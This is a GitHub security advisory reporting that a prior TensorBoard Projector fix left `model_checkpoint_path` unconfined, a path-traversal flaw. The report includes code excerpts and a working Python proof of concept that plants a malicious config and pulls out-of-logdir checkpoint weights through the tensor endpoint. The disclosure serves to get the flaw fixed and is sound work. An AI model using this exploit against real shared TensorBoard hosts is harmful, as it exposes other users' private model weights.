[Security] Incomplete fix of #7115: projector `model_checkpoint_path` is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir

Reporting here as advised in https://issuetracker.google.com/issues/522459885

Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)

### Summary

Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user controlled asset paths in `projector_config.pbtxt` (`metadata_path`, `tensor_path`, `bookmarks_path`, and `sprite.image_path`) are resolved against, and confined to, the directory that contains `projector_config.pbtxt`. The fix did not cover a fifth user controlled path in the same config file: `model_checkpoint_path`. That field is still passed straight to `tf.train.load_checkpoint()` with no confinement check. An attacker who can write or influence a `projector_config.pbtxt` under a scanned logdir (the exact threat model the #7115 fix addresses) can point `model_checkpoint_path` at any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises them in the served config, and returns their raw tensor bytes through the `/data/plugin/projector/tensor` route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi tenant TensorBoard deployment is the most sensitive asset present.

### Details

The fix added `_rel_to_abs_asset_path()` (`tensorboard/plugins/projector/projector_plugin.py:212`), which resolves a candidate path and rejects it when it escapes the config directory:

```python
def _rel_to_abs_asset_path(fpath, config_fpath):
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate
```

The four patched fields route through this function: `tensor_path` (line 380 and 680), `metadata_path` (line 620), `bookmarks_path` (line 752), and `sprite.image_path` (line 801). Pointing any of those at a path outside the logdir now returns a clean `400`.

`model_checkpoint_path` does not. It is read from the attacker controlled config in `_read_latest_config_files()` (`text_format.Parse(file_content, config)`, line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in `_get_reader_for_run()`:

```python
# tensorboard/plugins/projector/projector_plugin.py
478    if (
479        config.model_checkpoint_path
480        and _using_tf()
481        and not tf.io.gfile.glob(config.model_checkpoint_path + "*")   # existence only
482    ):
...
498    if config.model_checkpoint_path and _using_tf():
499        try:
500            reader = tf.train.load_checkpoint(config.model_checkpoint_path)  # no confinement
```

There is no call to `_rel_to_abs_asset_path(config.model_checkpoint_path, ...)` anywhere, so the path is never confined to the config directory.

The readback is automatic and does not require the attacker to know any variable names. In `_augment_configs_with_checkpoint_info()` the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:

```python
415    var_map = reader.get_variable_to_shape_map()
416    for tensor_name, tensor_shape in var_map.items():
417        if len(tensor_shape) != 2:
418            continue
...
425        embedding = config.embeddings.add()
426        embedding.tensor_name = tensor_name
```

That augmented config is returned by `/data/plugin/projector/config`. The client then requests each tensor, and `_serve_tensor()` returns the raw bytes:

```python
699    reader = self._get_reader_for_run(run)
...
709    tensor = reader.get_tensor(name)
...
719    data_bytes = tensor.tobytes()
720    return Respond(request, data_bytes, "application/octet-stream")
```

So the full chain is: attacker plants `projector_config.pbtxt` with `model_checkpoint_path` pointing outside the logdir, the config endpoint discloses the variable names and shapes of that out of logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.

The read is constrained to valid TensorFlow checkpoint files (a non checkpoint path such as `/etc/passwd` fails `load_checkpoint()` and is caught), so this is not arbitrary file read of any file. In TensorBoard's own domain that constraint still exposes the highest value data on the host: trained model weights from other users' runs.

### PoC

This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious `projector_config.pbtxt` that points at it, and shows the weights coming back out of the tensor endpoint.

```
python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py
```

`poc_model_checkpoint_path.py`:

```python
import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".")  # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin

work = tempfile.mkdtemp(prefix="tb_poc_")

# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
                   [9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))

# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))

plugin = projector_plugin.ProjectorPlugin(
    base_plugin.TBContext(logdir=logdir, data_provider=None))

def get(handler, query):
    return Client(handler).get("/?" + query)

cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"]   # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())
```

Observed output:

```
exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
```

For contrast, calling the patched helper with the same out of logdir path is rejected:

```
_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory
```

confirming the other four fields are confined while `model_checkpoint_path` is not.

### Impact

Information disclosure (CWE-22). An attacker who can write or influence a `projector_config.pbtxt` under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so it is not arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining `model_checkpoint_path` to the config directory.



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Incomplete fix of #7115: projector `model_checkpoint_path` is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119

Summary

Details

PoC

Impact

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

[Security] Incomplete fix of #7115: projector model_checkpoint_path is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119

Description

Summary

Details

PoC

Impact

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions

[Security] Incomplete fix of #7115: projector `model_checkpoint_path` is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119